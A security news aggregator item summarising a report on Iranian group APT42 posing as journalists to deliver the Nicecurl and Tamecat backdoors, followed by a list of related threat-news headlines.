Security News > 2024 > May > Iranian hackers pose as journalists to push backdoor malware

The Iranian state-backed threat actor tracked as APT42 is employing social engineering attacks, including posing as journalists, to breach corporate networks and cloud environments of Western and Middle Eastern targets.
Google threat analysts following APT42's operations report that the hackers use malicious emails to infect their targets with two custom backdoors, namely "Nicecurl" and "Tamecat," which provide command execution and data exfiltration capabilities.
Tamecat is a more complex PowerShell backdoor that can execute arbitrary PS code or C# scripts, giving APT42 much operational flexibility to perform data theft and extensive system manipulation.
The full list of Indicators of Compromise for the recent APT42 campaign and YARA rules for detecting the NICECURL and TAMECAT malware can be found at the end of Google's report.
Russian Sandworm hackers pose as hacktivists in water utility breaches.
Russian hackers target German political parties with WineLoader malware.
News URL
Related news
- Suspected Iranian Hackers Used Compromised Indian Firm's Email to Target U.A.E. Aviation Sector (source)
- Chinese Hackers Breach Juniper Networks Routers With Custom Backdoors and Rootkits (source)
- New ‘Rules File Backdoor’ Attack Lets Hackers Inject Malicious Code via AI Code Editors (source)
- Chinese FamousSparrow hackers deploy upgraded malware in attacks (source)
- North Korean Hackers Deploy BeaverTail Malware via 11 Malicious npm Packages (source)
- Chinese Hackers Target Linux Systems Using SNOWLIGHT Malware and VShell Tool (source)
- State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns (source)
- Chinese hackers target Russian govt with upgraded RAT malware (source)
- Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery (source)
- Iran-Linked Hackers Target Israel with MURKYTOUR Malware via Fake Job Campaign (source)